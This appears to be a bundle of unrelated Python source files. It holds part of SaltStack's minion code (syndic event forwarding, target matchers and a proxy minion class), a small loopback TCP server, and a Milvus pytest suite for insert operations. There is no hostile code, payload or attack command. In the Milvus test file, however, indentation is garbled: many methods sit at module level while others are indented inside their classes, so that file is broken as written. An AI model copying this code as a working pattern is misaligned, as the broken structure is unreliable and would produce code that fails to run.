        # Make sure to gracefully handle SIGUSR1
        enable_sigusr1_handler()
        loop_interval = int(self.opts['loop_interval'])
        self._reset_event_aggregation()
        while True:
            try:
                # Do all the maths in seconds
                timeout = loop_interval
                if self.event_forward_timeout is not None:
                    timeout = min(timeout,
                                  self.event_forward_timeout - time.time())
                if timeout >= 0:
                    log.trace('Polling timeout: %f', timeout)
                    socks = dict(self.poller.poll(timeout * 1000))
                else:
                    # This shouldn't really happen.
                    # But there's no harm being defensive
                    log.warning('Negative timeout in syndic main loop')
                    socks = {}
                # check all of your master_syndics, have them do their thing
                for master_id, syndic_dict in self.master_syndics.items():
                    # if not connected, lets try
                    if 'generator' not in syndic_dict:
                        # if we couldn't connect, lets try later
                        if not self._connect_to_master(master_id):
                            continue
                    # advance the non-blocking tune-in generator one step
                    next(syndic_dict['generator'])
                # events
                if socks.get(self.local.event.sub) == zmq.POLLIN:
                    self._process_event_socket()
                if (self.event_forward_timeout is not None and
                        self.event_forward_timeout < time.time()):
                    self._forward_events()
                # We don't handle ZMQErrors like the other minions
                # I've put explicit handling around the receive calls
                # in the process_*_socket methods. If we see any other
                # errors they may need some kind of handling so log them
                # for now.
            except Exception:
                log.critical(
                    'An exception occurred while polling the syndic',
                    exc_info=True
                )

    def _process_event_socket(self):
        '''
        Drain the local event bus, aggregating job returns into self.jids
        and other events into self.raw_events (bounded by
        syndic_max_event_process_time).
        '''
        tout = time.time() + self.opts['syndic_max_event_process_time']
        while tout > time.time():
            try:
                event = self.local.event.get_event_noblock()
            except zmq.ZMQError as e:
                # EAGAIN indicates no more events at the moment
                # EINTR some kind of signal maybe someone trying
                # to get us to quit so escape our timeout
                if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
                    break
                raise
            log.trace('Got event {0}'.format(event['tag']))
            if self.event_forward_timeout is None:
                self.event_forward_timeout = (
                        time.time() + self.opts['syndic_event_forward_timeout']
                        )
            if salt.utils.jid.is_jid(event['tag']) and 'return' in event['data']:
                if 'jid' not in event['data']:
                    # Not a job return
                    continue
                jdict = self.jids.setdefault(event['tag'], {})
                if not jdict:
                    # first return for this jid: seed the job metadata
                    jdict['__fun__'] = event['data'].get('fun')
                    jdict['__jid__'] = event['data']['jid']
                    jdict['__load__'] = {}
                    fstr = '{0}.get_jid'.format(self.opts['master_job_cache'])
                    jdict['__load__'].update(
                        self.mminion.returners[fstr](event['data']['jid'])
                        )
                if 'master_id' in event['data']:
                    # __'s to make sure it doesn't print out on the master cli
                    jdict['__master_id__'] = event['data']['master_id']
                jdict[event['data']['id']] = event['data']['return']
            else:
                # Add generic event aggregation here
                if 'retcode' not in event['data']:
                    self.raw_events.append(event)

    def _forward_events(self):
        '''
        Forward aggregated raw events and job returns to the masters via
        _call_syndic, routing each jid back to its originating master when
        __master_id__ was recorded, then reset the aggregation state.
        '''
        log.trace('Forwarding events')
        if self.raw_events:
            self._call_syndic('_fire_master',
                              kwargs={'events': self.raw_events,
                                      'pretag': tagify(self.opts['id'], base='syndic')},
                              )
        for jid, jid_ret in self.jids.items():
            self._call_syndic('_return_pub', args=(jid_ret, '_syndic_return'), master_id=jid_ret.get('__master_id__'))
        self._reset_event_aggregation()
class Matcher(object):
    '''
    Use to return the value for matching calls from the master
    '''
    def __init__(self, opts, functions=None):
        self.opts = opts
        # loaded execution modules; lazily populated by data_match if None
        self.functions = functions

    def confirm_top(self, match, data, nodegroups=None):
        '''
        Takes the data passed to a top file environment and determines if the
        data matches this minion
        '''
        matcher = 'compound'
        if not data:
            log.error('Received bad data when setting the match from the top '
                      'file')
            return False
        for item in data:
            if isinstance(item, dict):
                if 'match' in item:
                    matcher = item['match']
        if hasattr(self, matcher + '_match'):
            funcname = '{0}_match'.format(matcher)
            if matcher == 'nodegroup':
                return getattr(self, funcname)(match, nodegroups)
            return getattr(self, funcname)(match)
        else:
            log.error('Attempting to match with unknown matcher: {0}'.format(
                matcher
            ))
            return False

    def glob_match(self, tgt):
        '''
        Returns true if the passed glob matches the id
        '''
        if not isinstance(tgt, str):
            return False
        return fnmatch.fnmatch(self.opts['id'], tgt)

    def pcre_match(self, tgt):
        '''
        Returns true if the passed pcre regex matches
        '''
        return bool(re.match(tgt, self.opts['id']))

    def list_match(self, tgt):
        '''
        Determines if this host is on the list
        '''
        if isinstance(tgt, string_types):
            tgt = tgt.split(',')
        return bool(self.opts['id'] in tgt)

    def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Reads in the grains glob match
        '''
        log.debug('grains target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for grains match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(
            self.opts['grains'], tgt, delimiter=delimiter
        )

    def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Matches a grain based on regex
        '''
        log.debug('grains pcre target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for grains pcre match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(self.opts['grains'], tgt,
                                        delimiter=delimiter, regex_match=True)

    def data_match(self, tgt):
        '''
        Match based on the local data store on the minion
        '''
        if self.functions is None:
            self.functions = salt.loader.minion_mods(self.opts)
        comps = tgt.split(':')
        if len(comps) < 2:
            return False
        val = self.functions['data.getval'](comps[0])
        if val is None:
            # The value is not defined
            return False
        if isinstance(val, list):
            # We are matching a single component to a single list member
            for member in val:
                if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
                    return True
            return False
        if isinstance(val, dict):
            if comps[1] in val:
                return True
            return False
        return bool(fnmatch.fnmatch(
            val,
            comps[1],
        ))

    def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Reads in the pillar glob match
        '''
        log.debug('pillar target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for pillar match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(
            self.opts['pillar'], tgt, delimiter=delimiter
        )

    def pillar_exact_match(self, tgt, delimiter=':'):
        '''
        Reads in the pillar match, no globbing
        '''
        log.debug('pillar target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for pillar match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(self.opts['pillar'],
                                        tgt,
                                        delimiter=delimiter,
                                        exact_match=True)

    def ipcidr_match(self, tgt):
        '''
        Matches based on ip address or CIDR notation
        '''
        num_parts = len(tgt.split('/'))
        if num_parts > 2:
            # Target is not valid CIDR
            return False
        elif num_parts == 2:
            # Target is CIDR
            return salt.utils.network.in_subnet(
                tgt,
                addrs=self.opts['grains'].get('ipv4', [])
            )
        else:
            # Target is an IPv4 address
            import socket
            try:
                socket.inet_aton(tgt)
            except socket.error:
                # Not a valid IPv4 address
                return False
            else:
                return tgt in self.opts['grains'].get('ipv4', [])

    def range_match(self, tgt):
        '''
        Matches based on range cluster
        '''
        if HAS_RANGE:
            range_ = seco.range.Range(self.opts['range_server'])
            try:
                return self.opts['grains']['fqdn'] in range_.expand(tgt)
            except seco.range.RangeException as exc:
                log.debug('Range exception in compound match: {0}'.format(exc))
                return False
        return False

    def compound_match(self, tgt):
        '''
        Runs the compound target check
        '''
        if not isinstance(tgt, string_types):
            log.debug('Compound target received that is not a string')
            return False
        ref = {'G': 'grain',
               'P': 'grain_pcre',
               'I': 'pillar',
               'L': 'list',
               'S': 'ipcidr',
               'E': 'pcre'}
        if HAS_RANGE:
            ref['R'] = 'range'
        results = []
        opers = ['and', 'or', 'not', '(', ')']
        tokens = tgt.split()
        for match in tokens:
            # Try to match tokens from the compound target, first by using
            # the 'G, X, I, L, S, E' matcher types, then by hostname glob.
            # BUGFIX: use match[1:2] instead of match[1] so that a token
            # consisting of the single character '@' cannot raise IndexError.
            if '@' in match and match[1:2] == '@':
                comps = match.split('@')
                matcher = ref.get(comps[0])
                if not matcher:
                    # If an unknown matcher is called at any time, fail out
                    return False
                results.append(
                    str(
                        getattr(self, '{0}_match'.format(matcher))(
                            '@'.join(comps[1:])
                        )
                    )
                )
            elif match in opers:
                # We didn't match a target, so append a boolean operator or
                # subexpression
                if results or match in ['(', ')']:
                    if match == 'not':
                        # implicit 'and' before a leading 'not'
                        if results[-1] == 'and':
                            pass
                        elif results[-1] == 'or':
                            pass
                        else:
                            results.append('and')
                    results.append(match)
                else:
                    # seq start with oper, fail
                    if match not in ['(', ')']:
                        return False
            else:
                # The match is not explicitly defined, evaluate it as a glob
                results.append(str(self.glob_match(match)))
        results = ' '.join(results)
        try:
            # NOTE(security): eval is only fed 'True'/'False' and boolean
            # operators built above, never raw target text
            return eval(results)  # pylint: disable=W0123
        except Exception:
            log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
            return False
        return False

    def nodegroup_match(self, tgt, nodegroups):
        '''
        This is a compatibility matcher and is NOT called when using
        nodegroups for remote execution, but is called when the nodegroups
        matcher is used in states
        '''
        if tgt in nodegroups:
            return self.compound_match(
                salt.utils.minions.nodegroup_comp(tgt, nodegroups)
            )
        return False
class ProxyMinion(Minion):
    '''
    This class instantiates a 'proxy' minion--a minion that does not manipulate
    the host it runs on, but instead manipulates a device that cannot run a minion.
    '''
    def __init__(self, opts, timeout=60, safe=True):  # pylint: disable=W0231
        '''
        Pass in the options dict

        Loads the configured proxy module, connects to the proxied device,
        authenticates with the master, and prepares functions, returners,
        pillar, scheduler and matcher -- deliberately skipping
        Minion.__init__ (hence the W0231 disable).
        '''
        self._running = None
        # Warn if ZMQ < 3.2
        if HAS_ZMQ:
            try:
                zmq_version_info = zmq.zmq_version_info()
            except AttributeError:
                # PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
                # using zmq.zmq_version() and build a version info tuple.
                zmq_version_info = tuple(
                    [int(x) for x in zmq.zmq_version().split('.')]
                )
            if zmq_version_info < (3, 2):
                log.warning(
                    'You have a version of ZMQ less than ZMQ 3.2! There are '
                    'known connection keep-alive issues with ZMQ < 3.2 which '
                    'may result in loss of contact with minions. Please '
                    'upgrade your ZMQ!'
                )
        # Late setup the of the opts grains, so we can log from the grains
        # module
        # print opts['proxymodule']
        fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
        self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
        # connect to the proxied device and derive the minion id from it
        opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
        opts['id'] = opts['proxyobject'].id(opts)
        opts.update(resolve_dns(opts))
        self.opts = opts
        self.authenticate(timeout, safe)
        self.functions, self.returners, self.function_errors = self._load_modules()
        self.opts['pillar'] = salt.pillar.get_pillar(
            opts,
            opts['grains'],
            opts['id'],
            opts['environment'],
            funcs=self.functions
        ).compile_pillar()
        self.serial = salt.payload.Serial(self.opts)
        self.mod_opts = self._prep_mod_opts()
        self.matcher = Matcher(self.opts, self.functions)
        self.proc_dir = get_proc_dir(opts['cachedir'])
        self.schedule = salt.utils.schedule.Schedule(
            self.opts,
            self.functions,
            self.returners)
        # cache grains so refreshes can detect changes
        self.grains_cache = self.opts['grains']
        # self._running = True

    def _prep_mod_opts(self):
        '''
        Returns a copy of the opts with key bits stripped out
        '''
        return super(ProxyMinion, self)._prep_mod_opts()

    def _load_modules(self, force_refresh=False):
        '''
        Return the functions and the returners loaded up from the loader
        module
        '''
        return super(ProxyMinion, self)._load_modules(force_refresh=force_refresh)
|
tcp_server.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
import threading
# Address and port the TCP server listens on (loopback only).
bind_ip = "127.0.0.1"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
# Allow up to 5 pending connections in the accept backlog.
server.listen(5)
print ("[*] Listening on %s:%d" % (bind_ip,bind_port))
# Thread target that handles one client connection
def handle_client(client_socket):
    """Receive one request from the client, print it, and reply with ACK!.

    The socket is always closed, even if recv/send raises.
    """
    try:
        # Show the data the client sent (up to 1024 bytes)
        request = client_socket.recv(1024)
        print ("[*] Received: %s" % request)
        # Send the reply packet; sendall() keeps writing until every byte is
        # sent, unlike send() which may transmit only part of the buffer.
        client_socket.sendall("ACK!".encode('utf-8'))
    finally:
        client_socket.close()
# Accept connections forever, handing each client off to its own thread.
while True:
    client,addr = server.accept()
    print ("[*] Accepted connection from: %s:%d" % (addr[0],addr[1]))
    # Spawn a thread to process the received data
    client_handler = threading.Thread(target=handle_client,args=(client,))
    client_handler.start()
|
test_insert.py | import copy
import logging
import threading
import pytest
from pymilvus import DataType, ParamError, BaseException
from utils import utils as ut
from common.constants import default_entity, default_entities, default_binary_entity, default_binary_entities, \
default_fields
from common.common_type import CaseLabel
# Per-test timeout (seconds) applied via pytest.mark.timeout
ADD_TIMEOUT = 60
# Prefix used when generating unique collection names
uid = "test_insert"
field_name = ut.default_float_vec_field_name
binary_field_name = ut.default_binary_vec_field_name
default_nb = ut.default_nb
row_count = ut.row_count
default_tag = ut.default_tag
# Canonical single-vector search request used by the search smoke tests
default_single_query = {
    "data": ut.gen_vectors(1, ut.default_dim),
    "anns_field": ut.default_float_vec_field_name,
    "param": {"metric_type": "L2", "params": {"nprobe": 10}},
    "limit": 10,
}
class TestInsertBase:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
    @pytest.fixture(
        scope="function",
        params=ut.gen_simple_index()
    )
    def get_simple_index(self, request, connect):
        # Parametrized fixture: yields one simple index config per run,
        # skipping index types the CPU-only deployment cannot build.
        # if str(connect._cmd("mode")) == "CPU":
        if request.param["index_type"] in ut.index_cpu_not_support():
            pytest.skip("CPU not support index_type: ivf_sq8h")
        logging.getLogger().info(request.param)
        return request.param
    @pytest.fixture(
        scope="function",
        params=ut.gen_single_filter_fields()
    )
    def get_filter_field(self, request):
        # One scalar (filter) field definition per parametrized run.
        yield request.param
    @pytest.fixture(
        scope="function",
        params=ut.gen_single_vector_fields()
    )
    def get_vector_field(self, request):
        # One vector field definition per parametrized run.
        yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_empty_entity(self, connect, collection):
"""
target: test insert with empty entity list
method: set empty entity list as insert method params
expected: raises a ParamError exception
"""
entities = []
with pytest.raises(ParamError) as e:
connect.insert(collection, entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_None(self, connect, collection):
"""
target: test insert with None
method: set None as insert method params
expected: raises a ParamError
"""
entity = None
with pytest.raises(Exception) as e:
connect.insert(collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_collection_not_existed(self, connect):
"""
target: test insert, with collection not existed
method: insert entity into a random named collection
expected: raise a BaseException
"""
collection_name = ut.gen_unique_str(uid)
with pytest.raises(BaseException) as e:
connect.insert(collection_name, default_entities)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_without_connect(self, dis_connect, collection):
"""
target: test insert entities without connection
method: create collection and insert entities in it, check if inserted successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.insert(collection, default_entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
"""
target: test delete collection after insert entities
method: insert entities and drop collection
expected: has_collection false
"""
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_flush_drop_collection(self, connect, collection):
"""
target: test drop collection after insert entities for a while
method: insert entities, sleep, and delete collection
expected: has_collection false
"""
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.flush([collection])
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.timeout(ADD_TIMEOUT)
    def test_insert_create_index(self, connect, collection, get_simple_index):
        """
        target: test build index insert after entities
        method: insert entities and build index
        expected: no error raised
        """
        result = connect.insert(collection, default_entities)
        assert len(result.primary_keys) == default_nb
        connect.flush([collection])
        connect.create_index(collection, field_name, get_simple_index)
        if get_simple_index["index_type"] != "FLAT":
            index = connect.describe_index(collection, "")
            # NOTE(review): ut.create_target_index appears to normalize
            # get_simple_index in place before the comparison -- confirm
            ut.create_target_index(get_simple_index, field_name)
            assert index == get_simple_index
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_after_create_index(self, connect, collection, get_simple_index):
        """
        target: test build index insert after vector
        method: insert entities and build index
        expected: no error raised
        """
        connect.create_index(collection, field_name, get_simple_index)
        result = connect.insert(collection, default_entities)
        assert len(result.primary_keys) == default_nb
        if get_simple_index["index_type"] != "FLAT":
            index = connect.describe_index(collection, "")
            # NOTE(review): ut.create_target_index appears to normalize
            # get_simple_index in place before the comparison -- confirm
            ut.create_target_index(get_simple_index, field_name)
            assert index == get_simple_index
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_search(self, connect, collection):
        """
        target: test search entity after insert entity after a while
        method: insert entity, sleep, and search collection
        expected: no error raised
        """
        result = connect.insert(collection, default_entities)
        connect.flush([collection])
        connect.load_collection(collection)
        # a single-vector query should return a full top-k result set
        res = connect.search(collection, **default_single_query)
        assert len(res[0]) == ut.default_top_k
    @pytest.mark.tags(CaseLabel.L2)
    def _test_insert_segment_row_count(self, connect, collection):
        # Disabled test (leading underscore keeps pytest from collecting it):
        # inserting one row past the segment limit should produce 2 segments.
        nb = ut.default_segment_row_limit + 1
        result = connect.insert(collection, ut.gen_entities(nb))
        connect.flush([collection])
        assert len(result.primary_keys) == nb
        stats = connect.get_collection_stats(collection)
        assert len(stats['partitions'][0]['segments']) == 2
        for segment in stats['partitions'][0]['segments']:
            assert segment['row_count'] in [ut.default_segment_row_limit, 1]
    @pytest.fixture(
        scope="function",
        params=[
            1,
            2000
        ],
    )
    def insert_count(self, request):
        # Parametrized row counts: a single row and a large batch.
        yield request.param
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids(self, connect, id_collection, insert_count):
"""
target: test insert entities in collection, use customize ids
method: create collection and insert entities in it, check the ids returned and the collection length after entities inserted
expected: the length of ids and the collection row count
"""
nb = insert_count
ids = [i for i in range(nb)]
entities = ut.gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
"""
target: test insert vectors in collection, use customize the same ids
method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
expected: the length of ids and the collection row count
"""
nb = insert_count
ids = [1 for i in range(nb)]
entities = ut.gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, insert entities into id with ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
"""
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = ut.gen_unique_str("test_collection")
fields = {
"fields": [ut.gen_primary_field(), filter_field, vector_field],
"auto_id": False
}
connect.create_collection(collection_name, fields)
ids = [i for i in range(nb)]
entities = ut.gen_entities_by_fields(fields["fields"], nb, ut.default_dim, ids)
logging.getLogger().info(entities)
result = connect.insert(collection_name, entities)
assert result.primary_keys == ids
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_not_match(self, connect, id_collection, insert_count):
"""
target: test insert entities in collection without ids
method: create id_collection and insert entities without
expected: exception raised
"""
nb = insert_count
with pytest.raises(Exception) as e:
entities = ut.gen_entities(nb)
del entities[0]
connect.insert(id_collection, entities)
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
"""
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use customize ids first, and then use no ids
expected: BaseException raised
"""
ids = [i for i in range(default_nb)]
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
connect.insert(id_collection, entities)
with pytest.raises(Exception) as e:
del entities[0]
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_not_ids(self, connect, id_collection):
"""
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use not ids first, and then use customize ids
expected: error raised
"""
entities = copy.deepcopy(default_entities)
del entities[0]
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
"""
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
"""
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, id_collection):
"""
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
"""
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
entity = copy.deepcopy(default_entity)
entity[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entity)
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_partition(self, connect, collection):
        """
        target: test insert entities in collection created before
        method: create collection and insert entities in it, with the partition_name param
        expected: the collection row count equals to nq
        """
        connect.create_partition(collection, default_tag)
        result = connect.insert(collection, default_entities, partition_name=default_tag)
        assert len(result.primary_keys) == default_nb
        # inserting must not remove or rename the target partition
        assert connect.has_partition(collection, default_tag)
        connect.flush([collection])
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == default_nb
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition_with_ids(self, connect, id_collection):
"""
target: test insert entities in collection created before, insert with ids
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
entities = ut.gen_entities(default_nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities, partition_name=default_tag)
assert result.primary_keys == ids
logging.getLogger().info(connect.describe_collection(id_collection))
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_default_partition(self, connect, collection):
        """
        target: test insert entities into default partition
        method: create partition and insert info collection without tag params
        expected: the collection row count equals to nb
        """
        # explicitly target the built-in default partition
        result = connect.insert(collection, default_entities, partition_name=ut.default_partition_name)
        assert len(result.primary_keys) == default_nb
        connect.flush([collection])
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_not_existed(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it, with the not existed partition_name param
expected: error raised
"""
tag = ut.gen_unique_str()
with pytest.raises(Exception) as e:
connect.insert(collection, default_entities, partition_name=tag)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_repeatedly(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it repeatly, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
res = connect.get_collection_stats(collection)
assert res[row_count] == 2 * default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dim_not_matched(self, connect, collection):
"""
target: test insert entities, the vector dimension is not equal to the collection dimension
method: the entities dimension is half of the collection dimension, check the status
expected: error raised
"""
vectors = ut.gen_vectors(default_nb, int(ut.default_dim) // 2)
insert_entities = copy.deepcopy(default_entities)
insert_entities[-1]["values"] = vectors
with pytest.raises(Exception) as e:
connect.insert(collection, insert_entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_name_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field name updated
method: update entity field name
expected: error raised
"""
tmp_entity = ut.update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_type_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
"""
tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_value_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field value updated
method: update entity field value
expected: error raised
"""
tmp_entity = ut.update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_more(self, connect, collection):
"""
target: test insert entities, with more fields than collection schema
method: add entity field
expected: error raised
"""
tmp_entity = ut.add_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_more(self, connect, collection):
"""
target: test insert entities, with more fields than collection schema
method: add entity vector field
expected: error raised
"""
tmp_entity = ut.add_vector_field(default_nb, ut.default_dim)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_less(self, connect, collection):
"""
target: test insert entities, with less fields than collection schema
method: remove entity field
expected: error raised
"""
tmp_entity = ut.remove_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_less(self, connect, collection):
"""
target: test insert entities, with less fields than collection schema
method: remove entity vector field
expected: error raised
"""
tmp_entity = ut.remove_vector_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_value(self, connect, collection):
"""
target: test insert entities, with no vector field value
method: remove entity values of vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["values"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_type(self, connect, collection):
"""
target: test insert entities, with no vector field type
method: remove entity vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["type"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_name(self, connect, collection):
"""
target: test insert entities, with no vector field name
method: remove entity vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["name"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
# todo fix timeout
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
"""
target: test collection rows_count is correct or not with multi threading
method: create collection and insert entities in it(idmap),
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
milvus = ut.get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)
def insert(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
result = milvus.insert(collection, default_entities)
milvus.flush([collection])
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for th in threads:
th.join()
stats = milvus.get_collection_stats(collection)
assert stats[row_count] == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_disable_auto_flush(self, connect, collection):
"""
target: test insert entities, with disable auto-flush
method: disable auto-flush and insert, get entity
expected: the count is equal to 0
"""
delete_nums = 500
ut.disable_flush(connect)
result = connect.insert(collection, default_entities)
ids = result.primary_keys
res = connect.get_entity_by_id(collection, ids[:delete_nums])
assert len(res) == delete_nums
assert res[0] is None
class TestInsertBinary:
    """Insert tests against binary-vector collections (JACCARD metric)."""
    @pytest.fixture(
        scope="function",
        params=ut.gen_binary_index()
    )
    def get_binary_index(self, request):
        # Force every generated binary index param set onto the JACCARD metric.
        # NOTE(review): this mutates the shared param dict in place; harmless
        # while the written value is constant, but verify if metrics ever vary.
        request.param["metric_type"] = "JACCARD"
        return request.param
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_binary_entities(self, connect, binary_collection):
        """
        target: test insert entities in binary collection
        method: create collection and insert binary entities in it
        expected: the collection row count equals to nb
        """
        result = connect.insert(binary_collection, default_binary_entities)
        assert len(result.primary_keys) == default_nb
        connect.flush([binary_collection])
